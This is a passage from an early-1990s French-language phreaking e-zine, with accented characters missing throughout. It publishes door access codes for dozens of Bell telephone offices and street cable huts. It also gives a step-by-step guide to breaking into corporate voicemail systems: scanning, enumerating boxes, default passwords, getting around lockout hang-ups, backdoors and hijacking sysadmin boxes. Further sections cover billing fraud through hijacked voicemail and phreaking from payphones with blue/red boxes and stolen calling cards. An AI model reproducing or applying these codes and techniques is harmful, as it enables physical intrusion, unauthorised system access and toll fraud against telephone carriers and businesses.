fvrier, mais a m'tonnerait BEAUCOUP que tous les numros soient changs chaque mois... Alors, voici cette liste. Je me suis dit que a pourrait vous tre utile. Vous pourrez ainsi entrer et laisser votre paiement sur le coin d'un bureau, et repartir aussi vite sans rien toucher... LISTE DES CODES DES PORTES PRIODE DU 4 JANVIER AU 1ER FVRIER S.P.A.C pour tous les bureaux 2-4-6-8 Toutes les salles btiments 32-15 St-Ral (entre) 42-13 St-Ral (tages) 21-4 St-Ral (DMS) 15-32 (B23, B30, 203, 206, 209, 216) St-Ral Comm. Inform. (519) 13-24 D'Aiguillon (Entre) 23-54 D'Aiguillon (Intrieur) 24-15 D'Aiguillon (B222, Cos) 13-24 D'Aiguillon (Comm. Inform.) 13-24 St-Cyrille (Entre) 53-42 St-Cyrille (2 tage) 42-13 St-Cyrille (DMS, salle conf.) 13-42 Vanier - Rue Plante (DMS-1U) 53-42 Vanier - Rue Godin (CCD) 53-42 Ste-Foy (ext.) 41-35 Ste-Foy (int.) 35-2 Ste-Foy (cadenas) N/A Cap-Rouge OPM (Provencher) quipement 5-2-9-3 Rpartiteur 1-8-3-9 Cap-Rouge OPM (Des Chasseurs) quipement 1-8-3-5 Rpartiteur 5-1-3-7 Cap-Rouge (DMS-1U) Des Clercs 3-6-9-2 Lvis 23-41 Lvis (RCU) 4-0-0-1/ 1-0-0-4 St-Jean Chrysostome 23-41 Charny 23-41 St-Romuald 23-41 St-Romuald (int.) 42-3 St-Nicolas 23-41 St-Nicolas (DMS 1U) 1-0-0-4/ 4-0-0-1 Beaumont hutte 34-12 Hutte St-Etienne 34-12 Breakeyville DMS-1U 4-0-0-1 Loretteville (ext.) 43-25 Loretteville (int.) 15 Loretteville DMS-1U 1-4-0-8 Ste-Catherine 43-21 Ste-Catherine (DMS-1U) 1-4-0-8 Ancienne-Lorette 15-24 DMS-1U Anc.-Lor. 1-4-0-8 Hutte Ste-Famille 31-42 Valcartier 54-23 DMS-1U Valcartier 1-4-0-8 Charlesbourg 34-25 Charlesbourg int. 41-2 Charlesbourg DMS-1U 4-3-1-2 N. D. Laurentides 34-25 N. D. Laurentides (DMS-1U) 4-3-1-2 Stoneham 34-25 Parc Laurentides 21-4-3 Tewkesbury (DMS-1U) 4-3-1-2 Beauport 21-34 Boischatel 52-31 Ste-Brigitte 52-34 Ste-Anne-de-Beaupr 51-24 St-Tite 13-42 St-Fereol 54-32 Hutte Mt-Ste-Anne 25-42 St-Jean I.O. 51-42 Ste-Petronille I.O. 12-43 Hutte Ste-Famille 31-42 Bon, je crois que les huttes, ce sont les petites cabanes situes au coins des rues, ici et l, et qui ne contiennent que les "manholes" pour accder aux cbles. Vous ne pourrez pas aller payer vos comptes du Bell l, donc. Mais les autres bureaux, c'est... Comment? On ne peut pas aller comme a payer ses comptes au bureau du Bell? Qu'est-ce que tu racontes, Atreid!? Ah? Bon... Mais qu'est-ce qu'ils peuvent faire avec tous ces codes que j'ai trouv? Pardon? Mais c'est illgal, ! Les gens ne peuvent pas faire a, voyons! Phoque! Et moi qui croyais faire preuve de civisme aujourd'hui! DRING DRING, C'EST POUR JULIE LA FIN DE BLITZKRIEG BBS par Blitzkreig Nous en avons parl plusieurs fois dans les numros prcdents, chaque fois pour vous dire tout le bien qu'on en pensait: BLITZKRIEG BBS, qui avait ses assises au Kentucky, a ferm ses portes. Au retour des ftes, Predat0r a dcid de fermer boutique, laissant dans le deuil des centaines de pirates et d'afficionados de l'informatique "alternative". Lorsque, aux environs du 7 janvier, j'ai appel sur la ligne de BLITZKRIEG, je suis tomb sur un enregistrement, et c'est la gorge serre par l'motion que j'ai appris la triste nouvelle. J'ai traduit pour vous le contenu du message... ----- Bonjour, je suis John, ou Predat0r, ex-sysop du Blitzkreig BBS. J'aimerais vous dire que compter du 12 janvier, 17h00, le 502-499-8933 sera dsactiv, ce qui voudra dire que le systme est disparu. Si jamais j'installe une nouvelle ligne, sous un nouveau numro, je posterai l'information sur Pentavia, Ripco, et quelques autres systmes populaires. J'aimerais remercier tous ceux qui nous ont appuy lorsque le systme tait ouvert. Depuis le mois de fvrier 1990, jusqu'en janvier 93, nous avions reu 27,834 appels. Le dernier usager officiel tait Sinister Solution. Si jamais le systme repart, il sera plus gros, meilleur, et plus underground encore qu'il ne l'avait t. Je me retire donc officiellement en tant que Predat0r et je ferme officiellement BLITZKRIEG. Si jamais le systme r-ouvre, ce sera sous un nouveau nom et avec un nouveau pseudonyme. Si vous dsirez tout de mme me rejoindre, la bote postale est encore valide, et si vous voulez me contactez par voix, dbrouillez-vous pour trouver le numro. Stay free, et nous nous reverrons bientt... ----- Sortez les mouchoirs, les mecs... Heureusement, il reste encore quelques bons boards sur lesquels nous pouvons aller tromper notre peine. Je pense entre autres Cybernetic Violence, sis l'Ile des Soeurs, prs de Montral (c'est justement le board que visite Santa Claus ce mois-ci). Bien qu'il n'en ait pas fait mention dans son texte, on peut quand mme supposer que Predat0r a pos ce geste la suite de la parution du plus rcent bouquin de Bruce Sterling, THE HACKER CRACKDOWN (trs bon, au demeurant). Sterling le dcrit entre autres comme une des personnalits de l'underground les plus respectes. Predat0r avait repris, en 1990, la parution de TAP (Technical Assistance Program), le grand-pre de tous les 'zines underground. TAP avait vu le jour en 1971, Greenwich Village (NY). Le premier diteur de TAP n'tait autre que le regrett Abbie Hoffman, le pre du mouvement hippie, le pape du "protest mouvement"... On est en bonne compagnie, l, les enfants... Outre le fait que Predat0r tait lui-mme une "vedette", son board tait frquent par tout ce que la plante supporte comme pirates chevronns. Les handles les plus glorieux se croisaient sur ce board... Et c'est ici que je suis le plus impressionn, je crois: contrairement aux pirates qui aiment bien faire des gorges chaudes devant les camras, et qui sont tout fait "partiaux" au vedettariat, John, lui, a cru bon de s'clipser de la scne, le temps que les projecteurs "de la gloire" se tournent vers une autre victime. Je salue la modestie non-feinte de ce mec qui, force de dtermination et de travail, s'est hiss au fate de sa "profession". L o certains cherchent gagner leurs galons de pirate en crnant et en racontant des bobards, une telle attitude fait plaisir voir... Prenez-en de la graine, les kids... LA OU LA TECHNOLOGIE LE PERMET L'ABC D VMB Par Mental Floss Vous avez dj rv de possder votre propre vmb? Vous avez dj essay de hacker une vmb, mais vous n'tes jamais parvenu triompher? Les lignes qui vont suivre renferment la mthode miracle de: 'comment pogner avec les VMBs'. Cette introduction ressemble trangement aux annonces que l'on peut retrouver dans tous les journaux et magazines bidons (y compris Pif Gadget). On promet de rvler le secret de comment avoir des seins plus fermes ou bien comment voir au travers de trois murs de ciment avec un stylo. C'est sr qu'on peut se trouver une VMB en gossant, on peut toujours composer les passwords de 0000 9999 dans l'espoir de trouver quelque chose. Mais c'est une mthode stupide, il existe une faon bien plus simple de procder qui vous fera conomiser du temps. Bon assez de blabla et passons aux choses srieuses. -/- Dfinition -> VMB une seule dfinition: Voice Mail Box. En franais: Bote Vocale... -/- Qu'est-ce qu'un systme de VMBs? -> On peut comparer un systme de VMB un gros rpondeur distance, qui contient plein de petits rpondeurs. Certains systmes sont installs sur des PCs. De nos jours, on peut se procurer un systme complet (le soft et la carte), pour environ 250$. Par contre il faut avoir un gros hard disk, car une minute de messages compresss prend environ 200k. Donc imaginez un systme de 500 usagers, ayant un greetings d'une minute chaque et 5 messages de 2 minutes de sauvegards... -/- A quoi servent les VMBs? -> A part de servir tre hackes.. . Les compagnies installent gnralement un systme de VMBs pour que leurs employs puissent se laisser des messages privs entre eux. Aussi on les utilise pour permettre aux clients de laisser un message la personne qu'ils essaient de rejoindre, mais qui n'est pas disponible lors de l'appel. Certaines compagnies s'en serviront aprs les heures de bureaux, ainsi ils ne manqueront aucuns de leurs clients. Donc la VMB est un outil trs important pour ces compagnies. -/- Les diffrents moyens de rejoindre une VMB -> Votre VMB prfre peut se rejoindre de deux faons diffrentes, soit en composant un numro local ou un 1-800. Peu importe si elles sont locales ou pas, elles roulent sur des systmes de principe semblable: plusieurs botes o l'on peut laisser des messages des personnes diffrentes. -/- Qui offre un service de VMB? -> Gnralement vous pouvez obtenir une VMB tout fait gratuitement, si la compagnie pour laquelle vous travaillez possde son systme. Aussi certaines compagnies prives offrent des services de messagerie vocale, entre autres les compagnies de locations de pagettes et de tlphones cellulaires. Bell Canada vous offre aussi un systme local de VMB, mieux connu sous le nom de Tl-Messageries Bell. -/- Pourquoi hacker une VMB? -> Certains se demanderont srement quoi cela sert de hacker une VMB. Les possibilits sont infinies, l'avantage principal d'avoir une VMB est qu'on peut se faire rejoindre par n'importe qui appelant d'Amrique, et ce sans frais pour la personne qui appelle, condition d'avoir une VMB 1-800, qui est rejoignable en dehors du Canada. On a juste penser... tu rencontres quelqu'un sur un bbs, et tu ne veux pas lui donner ton vrai numro, tu lui donnes ton numro de VMB et voil... Si t'as quinze petites filles qui te courrent aprs, mais que tu veux garder ta ligne pour scanner...tu leurs donnes ton numro de VMB, comme a elles pourront te laisser des beaux messages dans le genre de 'Salut beaut...' Mais part les exemples inutiles mentionns ci-haut, on peut utiliser sa VMB des fins plus LGALES... Par exemples, runner une 'codeline' ou faire des 'free calls'. Codeline? Une codeline, est une VMB qu'on utilise pour donner et recevoir des codes (Pbx,Outdial,NUI,CC# etc) ou toutes autres informations. Les codes que les gens laissent sur la VMB seront plus tard posts par le propritaire de cette bote, et ainsi les informations seront renouvelles rgulirement. Free calls? Vous connaissez tous le principe de faire charger un appel sur un troisime numro, donc vous utilisez votre VMB comme troisime numro lorsque vous faites des appels partir d'une cabine tlphonique. Le principe est simple, comme greetings vous enregistrez le message suivant: 'Oprateur, ce numro accepte les frais d'appel'. Et voil, vous venez de faire charger votre appel sur votre VMB. -/- Comment trouver un systme de VMB? -> Avant de penser hacker une box, il est capital d'avoir un systme dans lequel on peut hacker dedans, c'est comme vident. Le seul moyen de trouver un systme, c'est de scanner. Soit que tu prends un prfix dans lequel que t'es sr qu'il y a une compagnie et tu scannes dedans. Soit que tu scannes avec ToneLoc le speaker 'ON' et espre d'entendre quelques systmes parmis les 10000 numros composer. Et finalement la mthode la plus simple est d'utiliser des numros qu'on a dj scann avec ToneLoc. Le principe est simple, tu prends ton TONE.LOG et tu recomposes manuellement tout les VOICE (1) jusqu' temps de trouver quelque chose. Aps plusieurs heures de scanning la mitaine, on a constat que 90% des systmes de VMB taient sur des VOICE (1), quelque fois sur des TIMEOUT (1), rarement sur BUSY/UNKNOWN et jamais sur d'autres choses, mme pas sur un VOICE (2) ou TIMEOUT (2). Tout a ralis avec le GETDELAY de ToneLoc 50, l'aide d'un modem USR HST sett ATX6. Si vous avez des modems 2400 qui ne dtectent pas les vrais VOICE et les vrais BUSY, ben oubliez a et achetez-vous un VRAI modem. Il est important de vrifier si le systme est 24 heures ou bien seulement aprs les heures de bureau. Pour se faire vous avez seulement essayer de rejoindre le systme en plein jour; une petit bonne femme rpond? Le systme est alors seulement actif aps les heures de bureaux, communment appel 'after hours'. Si vous trouvez un systme after hours, ne perdez pas votre temps hacker dedans, a ne vaut pas la peine. A part bien sr si vous trouvez un outdial. -/- Les modes d'accs la VMB -> Avant de hacker, il faut savoir comment atteindre la messagerie. La messagerie peut s'accder en deux modes diffrents, soit si on veut laisser un message quelqu'un ou soit si on veut accder notre box. Pour laisser un message une box on peut faire: composer le numro pendant le message d'entre et/ou faire # ensuite, * ou **. Un message nous dira alors quelle box on veut envoyer un message. Pour accder sa box on fait gnralement #, ## ou *7 ensuite on a un message disant d'entrer son numro et son mot de passe. Il existe aussi d'autres faons d'accder ces modes, il suffit d'couter le message d'entre et la plupart du temps on explique comment. -/- Comment trouver une box? -> Pour hacker une box, il faut avoir une box hacker bien sr. Mais avant de hacker une box, il y a quelques petites choses qui seraient intressantes de savoir si on veut sauver du temps: de combien de chiffres est le numro de la box? La box peut-elle commencer par tous les chiffres? Si non par lesquels? Si un numro de box est valide, soit que: -vous entendez le message du bonhomme -a sonne pis le bonhomme rpond -a sonne pis a dit que le bonhomme est pas l et vous pouvez laisser un message. -a dit: Mailbox XXXX. -en mode 'accs la box' a dit: 'Enter your password'. Si la box est invalide... -a dit que la box est invalide -que ce numro n'existe pas -et tout autres choses du genre.... Mais attention sur certains systmes en mode 'accs la box', que vous entriez n'importe quel numro de box, on vous demande toujours un mot de passe ensuite. Et cela mme si le numro de la box n'est pas valide. Dans cette situation, le seul moyen de vrifier si la box est valide, est de composer le numro en question en mode 'laisser un message'. En gnral les boxes sont de 3 ou 4 chiffres, parfois 2 ou 5 mais c'est plutt rare. Pour trouver de combien de chiffres est la box, il suffit d'entrer dans la messagerie par n'importe quelle des deux modes et composer des chiffres jusqu' temps d'entendre le message d'une box, se faire transfrer cette extension ou bien un message disant que le numro de la box est invalide. Parfois en mode 'laisser message', on entre 4 chiffres et on se fait dire que c'est invalide, mais si on va essayer la mme chose en mode 'accs la box' aps 3 chiffres entrs, si on se fait dire que le numro est invalide a veut dire que la box est vraiment de 3 chiffres et non 4. En gnral, c'est une tche trs facile de trouver de combien de chiffres est le numro des boxes. Parfois mme, on dit clairement: 'Composez l'extention de quatre chiffres et faites #' Les boxes peuvent tre situes entre 1000 et 9999 (100 et 999 pour un 3 chiffres). Une premire faon d'liminer des secteurs chercher, si les boxes se rejoignent en composant leur numros l'entre, est de vrifier que lorsqu'on pse sur une touche, on est pas connect une boxe ou service direct. Exemple, je pse sur 0 et l'opratrice embarque, donc c'est sr qu'il n'y a pas de boxe qui commence par 0. Je pse sur 1, j'ai des informations sur la compagnie, sur 2 une bonne femme veut prendre ma commande... et ainsi de suite. Donc on sait qu'il n'y aura aucune box commenant par 0-1-2 etc... S'il n'y a aucun numro d'limin, commencez par 1000 et montez par coup de mille jusqu' 9000, si rien encore commencez 1000 par coup de 100 jusqu' 9900. Si le systme a des boxes de 3 chiffres, allez-y par 100 et ensuite 10. ATTENTION, sur la majorit des systmes, si vous faites plus de 3 erreurs, le systme vous raccroche. Voir plus bas pour savoir comment contourner cela. La plupart des boxes sont regroupes ensemble dans le mme coin, et la plupart du temps entre 1000 et 2000 ou 4000-5000, mais a varie. En gnral, la boxe de l'administrateur du systme est entre 9000-9999, gnralement c'est 9999. J'utilise souvent les termes 'la plupart du temps/gnralement', parce que la majorit des fois c'est vrai mais a dpend toujours de l'humeur du sysadmin. Par contre, vous ne trouverez pas 20 boxes la suite, la plupart du temps les boxes sont espaces de 3-4 chiffres, pour dcourager les hackers. Aussi sur certains systmes, un rpertoire de tous les usagers est disponible, soit en faisait 9, 1 ou *1. Si un rpertoire est disponible, il sera annonc comment y accder dans le message d'entre. Le principe du rpertoire est qu' l'aide des touches du tlphone, vous entrez les 3 premires lettres du nom/prnom de la personne recherche. Dans cette situation, entrez comme lettre 2 (ABC) et faites #. S'il y a pas trop de noms ou ben que le systme est mal fait, vous pourrez avoir accs toute la liste des usagers. Par contre, s'il n'aime pas seulement le 2, faites 2 5 8 et #. En gnral, il y a toujours des noms dans cette zone. Si le systme dit : 'there's more than one name' faites #. Soit qui te donne les noms (s'il y en a moins que cinq) ou ben qui te dit: 'there're too many names'. En gossant avec a, il y a toujours moyen de trouver quelques choses. -/- J'ai trouv un paquet de boxes, lesquelles je hack? -> Quand tu trouves une boxe, elle peut tre dans deux tats: occupe ou libre. Vous pouvez hacker n'importe quelles boxes, mais si vous dcidez d'en garder une, elle doit absolument ne pas appartenir personne, c'est ce qu'on appelle une Free Box. Le principe des Free Boxes est le suivant: c'est une bote qui trane sur le systme et qui n'appartient personne. En gnral, le sysadmin cre une dizaine de ces free boxes sur le systme. Pourquoi vous me dites? Parce que tous les sysadmins sont paresseux et lorsqu'un nouvel employ est engag, ils n'ont pas besoin de se forcer le cul pour trouver une place de libre et crer une nouvelle box. Ils ont juste donner au nouvel employ la premire free box de la liste. Donc si vous trouvez 10 free boxes sur un systme, il est toujours prfrable de s'approprier la dernire ou l'avant- dernire. a peut tre long et laborieux de trouver une free box, car elles sont en nombre limit et on a de grandes chances de se faire couper aprs trois erreurs. C'est l que a devient intressant de hacker les boxes dj occupes. Dans une boxe, on retrouve gnralement l'option 'Make a Distribution List', cette option permet de crer une liste contenant les numros de boxes des autres usagers auxquels on veut envoyer des messages. C'est le mme principe qu'un Group mail ou Mass Mail, envoyer un message 10 personnes en composant seulement le numro de la liste voulue. Donc avec cette liste on peut entrer tant de numros qu'on veut sans se faire raccrocher et on sait si le numro est valide ou pas. Pour sauver du temps, lorsque vous hackez des boxes dj utilises, il est bon de faire un tri avant. A chaque box valide, coutez le message: si c'est une femme qui parle, si le gars a vraiment l'air niaiseux ou si y a des problmes d'enregistrement (on dirait qu'il est 50 pieds du tlphone, pse sur 4-5 touches avant de trouver la bonne pour sauver le greetings) ou toutes autres personne qui l'air d'un deux de pique, prenez son numro en note. Il y a de forte chance qu'il ait choisi un mot de passe aussi stupide que lui. -/- Comment faire pour savoir si c'est une Free Box -> En gnral les free boxes, n'ont pas de messages d'annoncement (greetings). Aucun nom n'a t assign la bote. Donc si vous composez un numro et a dit: MAILBOX XXXX, il y a des bonnes chances qu'elle soit free. De plus, si vous tes en mode 'accs la box' et que lorsque vous entrez un numro a dit: 'This voice mail system will increase your...blabla...Please enter the password assigned to you by your system manager....', c'est officiel que cette box est free. Mais si a dit: 'Tony Lamothe, Please enter your password...', la box est comme occupe...change de box... Parfois la box est occupe mais n'a pas de greetings d'enregistr. Si vous entrez dans la boxe et vous trouvez un paquet de messages rcents, changez de box... -/- Comment trouver le mot de passe de la free box en question -> Lorsqu'on hack une free box, il ne faut pas se casser la tte essayer des mots de passe compliqus. En gnral, les free boxes ont des mots de passe trs faciles retenir, car la majorit des sysadmins n'ont mme pas leur secondaire cinq; pensez-vous qu'ils seraient capable de retenir un mot de passe de dix chiffres random pendant cinq mois? Non. Donc le principe est d'essayer des mots de passe vraiment niaiseux. De plus, la majorit des systmes de VMBs ont des mots de passe par dfaut pour les free boxes. La liste qui suit donne les mots de passe essayer. Mots de passe par dfaut: ------------------------- Le mot de passe est pareil que le numro de la box. exemple: box = 2637 pwd = 2637 Le mot de passe est l'inverse du numro de la box. exemple: box = 3279 pwd = 9723 Le mot de passe est le numro de la box plus un 0. Cette mthode est trs poupulaire avec les systme de type ASPEN. exemple: box = 627 pwd = 6270 Autres mots de passe essayer: ------------------------------- 0000 Trs frquent 1111 Frquent 9999 Frquent 1234 Les usagers aiment bien ce mot de passe! 4321 2222 3333 4444 5555 6666 7777 8888 9999 Si la box a plus de 4 chiffres, rajouter des chiffres pour que la longueur du mot de passe gale la longueur du numro de la box. Exemple: box = 35373, essayez genre 12345 ou 11111. Si cela ne marche pas, essayer tous autres mots de passe que vous trouverez pertinents. Essayez surtout des squences de chiffres, genre 4567, 8765, 1122, ou 7337. Dans certains cas il peut y avoir aucun mot de passe sur la box! Une chose retenir, ne perdez pas 2 heures gosser sur un mot de passe qui semble impossible trouver. Quand vous avez essay les mots de passe par dfaut et certains autres, et que vous voyez que cela ne donne rien, changer immdiatement de systme. Ne perdez pas votre temps sur des causes perdues, il existe tellement d'autres systmes de VMBs. Vous aurez juste re-scanner un peu et de nouveau vous pourrez dplomber une autre box vierge. Sur certains systmes, on peut savoir quelle est la longueur du mot de passe. Si aps quatre chiffres entrs, vous entendez un message disant que le mot de passe est invalide, il y a de fortes chances que le mot de passe soit de quatre chiffres. Par contre un systme comme 'Message Center' vous donnera un message d'erreur lorsque vous aurez entr un chiffre de plus que la longueur du mot de passe. Mais attention, certains systmes attendent 2-3 secondes avant de dire si le mot de passe est invalide ou pas, donc il est quasiment impossible de deviner la longueur du mot de passe. Sur d'autres vous devrez faire # pour valider le mot de passe, donc encore ici aussi c'est presque impossible. Dans 80% des cas, les mots de passe sont de quatre chiffres, donc essayez plus souvent des mots de passe de cette longueur. Parfois, certains systmes bloquent carrment l'accs la box lors d'erreurs rptes. Lorsque vous entrez 3 mauvais mots de passe de suite, la box se barre automatiquement. Le seul moyen de russir entrer de nouveau est de demander au sysadmin. C'est un trs bon moyen de protection, mais il est rarement utilis. Dans de rares occasions, le systme peut contenir une backdoor qui permet d'entrer dans n'importe quelle box, mme si on ne connat pas le mot de passe. Si lorsque vous tes en mode 'laisser message', vous composez un numro et que rien ne se passe mais qu'au bout de 5-6 secondes a raccroche, il y a de fortes chances que ce soit une backdoor. Pour l'utiliser, vous avez juste composer le numro de la backdoor suivit du numro de la box dsire et bingo le tour est jou. -/- Comment djouer la passe du Hang-Up aps trop d'erreurs -> Sur certains systmes a marche, sur d'autre a marche moiti ou pas du tout. Il y a des hang-ups cause de trop d'extensions invalides ou bien trop de mots de passe errons. Pour contourner le hang-up aps trop de boxes invalides, c'est trs simple: il suffit d'entrer un numro de box valide tous les deux boxes invalides et ainsi de suite. Au dbut on peut se faire hang- uper plusieurs fois avant de trouver un numro valide. Exemple: je sais que 1234 est une bote valide. je fais 2500...box invalide je fais 2600...shit invalide je fais 1234...cool valide et on recommence.. 2700...invalide 2800...invalide 1234...Ok, vous comprennez le principe? En gneral, aps trois mauvais mot de passe on se fait hang- uper... Donc, sur certains systmes, aprs deux erreurs t'as juste faire * et tu vas revenir au message d'entre. Et ainsi tu peux recommencer autant de fois que tu veux. Parfois, * ne marche pas donc t'es oblig de rappeler tous les coups. Des fois vous pouvez utiliser ces trucs dans les deux modes, i.e: * marche pour le mode 'laisser msg' et le numro valide marche pour 'accs la box'. -/- Que fais-je une fois la box dplombe? -> Plus on prend de prcautions, plus notre box va durer longtemps. C'est sr que si tu t'appropries la box d'un usager, a sera pas long que tu vas l'avoir perdue. Le gars quand il va essayer d'accder sa bote et qu'il va voir que son mot de passe et son greetings sont changs, va immdiatement contacter le sysadmin. Le sysadmin sera averti qu'il y a du monde qui essaye de hacker le systme et renforcera les mesures de scurit. Donc c'est pour cela qu'il ne faut jamais et je dis jamais, prendre une box dj occupe. Par contre si tu entres dans la box de quelqu'un et que tu trouves 10 nouveaux messages datant de 3 mois, il y a de fortes chances que la personne n'utilise plus sa box. Donc c'est seulement dans cette situation qu'on peut prendre une box non free. a peut prendre un bon moment avant que quelqu'un s'aperoive de quelque chose d'anormal, si t'as hack une free box. Ok, premire chose que tu fais une fois que t'as une free box, tu touches RIEN. Ne change rien, appelle rgulirement la box pendant 2-3 jours ouvrables, pour voir s'il y a des nouveaux messages. Si oui, oublies-a et changes de box, sinon cette fois changes seulement le mot de passe et revrifies encore pendant 2-3 jours. S'il n'y a toujours pas de nouveaux messages, change le greetings (message d'annoncement) et vrifie de temps en temps encore un peu. N'enregistres pas un message genre: 'Salut les boys ici Tony The Ripper, j'ai des CCs pour vous les voici...blabla'. Voyez le genre?. Aprs une dizaine de jours, vous aurez une box qui risque de durer plus longtemps que si la premire occasion vous aviez tout chang dedans. Il y a des boxes qui durent plus de 6 mois et d'autres seulement 12 heures, tout dpend de la patience qu'on a... -/- Les types de systmes -> Il existe diffrents types de systmes, avec de la pratique vous serez capable des distinguer facilement. Voici une liste des systmes les plus populaires avec une brve description pour chacun. ASPEN ----- Un des bons systmes contenant beaucoup d'options. Il est facile reconnatre car la plupart du temps c'est une voix de femme qui rpond: 'Hello, this is ASPEN, an automated speech exchange network'. Pour entrer dans le systme de messagerie faites: '*', vous entendrez alors: 'Please dial the number of the person you're calling, if you have a box on this system press #'. Gnralement les box sont de 3-4 chiffres et les mots de passe de 4-5 chiffres. Lorsque vous composez un numro de box qui n'existe pas, la premire fois a dit 'Mailbox XXXX is Invalid', la deuxime fois a dit: 'You dialed XXXX there's no such number here' et la troisime fois a raccroche. Le mot de passe par dfaut est gnralement le numro de la box + 0. AUDIX ----- Contient presque toutes les mmes options que les autres, mais ce qui caractrise ce systme est l'usage de * plus une lettre pour accder aux options. Exemples: Transfrer d'extension *T(8), logger dans le systme de messagerie *S(7), avoir de l'aide *H(4), effacer le message *D(3) etc... MERIDIAN MAIL ------------- C'est un des systmes qui contient le plus d'options. En gnral, on choisi l'option voulue en appuyant sur 2 chiffres. Ce systme est facile reconnatre, car la plupart du temps il rpond: 'Meridian Mail, to mailbox...' et une fois la box compose il dit : 'Mailbox X-X-X-X'. CINDY ----- Un autre systme assez frquent. Il rpond en disant: 'Good morning, please enter the mailbox you wish to reach'. Aprs trois essais infructueux, le systme dit: 'Good morning/evening' et raccroche. Ce qui est intressant avec ce systme, c'est que vous pouvez crer un genre de sous-box 'invit', en tout 4 boxes: home, 2 guest et 1 secretary. En fait se sont d'autres mots de passe que vous dfinissez pour les sous-boxes, et le nombre d'options sera restreint selon le mot de passe entr. Le mot de passe par dfaut est gnralement 0. Il y a aussi des QMAIL, Phone Mail, CallXpress, Genesis, Message Center et d'autres systmes qui ne se nomment pas. A la longue, vous serez capables des reconnatre. -/- Les boxes des sysadmins -> La plupart des systmes contiennent une boxe qui permet de tout contrler. Avec cette boxe, on peut crer des boxes, changer les diffrents greetings d'entre, changer les options du menu principal, dfinir o a sonne quand on pse sur 0 etc... Mais ce n'est pas toutes les boxes de sysadmin qui permettent de faire cela, en gnral ils peuvent seulement changer les greetings d'entre et quelques autres choses pas importantes. La meilleure chose faire avec une box sysadmin, est de vous crer une boxe dans un coin pas trop occup du systme. Ou bien vous pouvez changer o sonnent certaines extensions, en les redirigeant vers des numros externes, style bbs et pbx. Il y a des systmes qui se contrlent seulement partir de PC. Parfois certaines boxes se connectent des carrier et on peut ainsi avoir accs diverses commandes d'administration. Les boxes de sysadmins sont gnralement entre 9000 et 9999, le plus souvent c'est 9999 ou 999. Les boxes qui donnent un carrier ont gnralement un numro plus long d'un chiffre, 12345 au lieu de 1234 et ne se trouvent pas assurment en haut du 9000, mais plutt un peu partout. -/- Exemple d'un menu de sysadmin -> System Maintenance Function 1:Change Or Delete A system Broadcast Message 2:Record or delete a mailbox name 3:Record or delete The System Greeting 4:Record or delete logon msg 5:Record an announcement message 6:Change answer mode override 7:Change new msg into annoucement 8:Change save msg into annoucement *: Quit system admin -/- Conclusion -> Une vmb c'est bien plaisant, et encore bien plus plaisant quand t'es capable de les hacker facilement. Dans pas grand temps, vous aurez tellement de VMBs, que vous ne saurez mme plus quoi en faire. D'ici l, continuez espionner sur les systmes en coutant les messages. Mais rappelez-vous ceci: 'Jouez prudemment, moi je peux remettre mon bras, vous pas....' -Astor A QUI APPARTIENT LE RATON QUI RONGE NOS FILS?! HACKER D'UNE FORTERESSE par Blitzkreig Plusieurs de vos messages, au cours des dernires semaines, taient l'effet que le hack d'une cabine tlphonique tait peut-tre la voie du futur. Oui, mais comment s'y prendre? Les cabines tlphoniques pullulent dans le paysage de la vieille capitale. Certains endroits, comme le Mail St-Roch, possdent mme des cabines accessibles toute heure du jour ou de la nuit, au chaud, avec des bancs proches, bref, c'est quasiment comme si vous tiez dans votre salon... On appelle les cabines tlphoniques "forteresses" pour une bonne raison: rien, ou presque rien, ne peut vous arriver lorsque vous faites du modem partir d'une cabine tlphonique. Le temps de raction des techniciens du Bell (surtout la nuit) exclut que vous vous ramassiez avec trois voitures de police autour de votre cabine. Contrairement aux oprations de tlmatique conduites depuis votre domicile, vous pouvez encore, d'une cabine tlphonique, utiliser des stratagmes frauduleux comme la bote rouge, la bote bleue, les cartes d'appel voles, bref, toute la panoplie des petits trucs qui vous sont dsormais interdits de chez vous... Ce qu'il faut retrouver dans le kit de tout bon hacker nomade... Vous avez besoin, naturellement d'un portatif. Bon, pas besoin de vous ruiner, l, pas besoin d'un 486-50 pour hacker d'une cabine! Une machine puissante, vous le savez comme moi, n'est souvent requise que pour faire fonctionner des jeux sophistiqus. Et vous n'allez pas dans une cabine pour jouer, mais bien pour leecher, downloader des warez, hacker des systmes, et courir les babs LD. Un vieux 286 portatif est amplement suffisant, le reste, c'est du gaspillage. C'est une bonne nouvelle parce que, en cherchant un peu, vous allez trouver un 286 usag sur le march pour moins de 500 dollars. Vous aurez aussi besoin d'un modem portatif, interne ou externe. Un modem interne va pouvoir s'alimenter mme la batterie de votre portatif. Un modem externe, par contre, pourrait exiger que vous ayez une source d'alimentation supplmentaire (mais pas dans tous les cas). Si vous tes l'intrieur d'un immeuble, pas de problmes. Si par contre vous tes sur le trottoir, je ne vous conseille pas de tenter de brancher votre gear sur la batterie de votre voiture. Vous devrez peut-tre vous acheter un modem portatif, alors ouvrez bien vos oreilles: ZyXEL, c'est la marque que vous devez trouver. Pourquoi? Parce que, en plus de fabriquer des V.42 bis, des V.32bis et des V.33 portatifs, les modems ZyXEL possdent une caractristique jusqu' prsent UNIQUE cette marque, un "MODE CELLULAIRE". ARQ, ASL, et tout le reste, ce genre de protocole est la raison qui a fait de USRobotics le modem de choix pour les amateurs de wares et de PBX de mauvaise qualit. ZyXEL a dvelopp son propre protocole exclusif qui vous permettra de faire, lorsque le temps sera venu, du phreak cellulaire. Et a s'en vient plus vite que vous ne le pensez; alors, tant qu' vous acheter un nouveau modem portatif, prvoyez- donc pour la nouvelle technologie... Sinon, avec n'importe quel autre marque, vous ne russirez que trs rarement dpasser le 1200 bauds partir d'un cellulaire. Remarquez que de toutes faons, vous allez phreaker d'une cabine tlphonique parce que vos LD ne vous cotent rien, alors, vous n'tes peut-tre pas obligs d'y aller en 14.4... Je viens de parler de hacking partir de cellulaire. Plusieurs pirates amricains et canadiens s'y sont dj mis. Northern Phun Co. a, je dois l'avouer quelques mois de retard sur son propre programme de piratage de cellulaire. Mais on va s'y mettre bientt, vous allez voir! Invitablement, il va falloir abandonner nos vieux systmes. La tlphonie sans fil est nos portes. A preuve ce petit article... Leeched from LE JOURNAL BELL - 25 janvier 1993 Les premiers rseaux de tlphonie sans fil pourraient tre oprationnels pour la fin de 1993. Marie Caron, directrice des communications chez Bell Mobilit Cellulaire, considre en effet que les premires communications sans fil pourraient tre tablies au Canada la fin de 93 ou au dbut de 94. Fin dcembre, un pas important tait d'ailleurs franchi dans cette direction. Le ministre des Communications du Canada, Perrin Betty, dlivrait alors quatre licences autant de compagnies les autorisant offrir un service tlphonique public sans fil 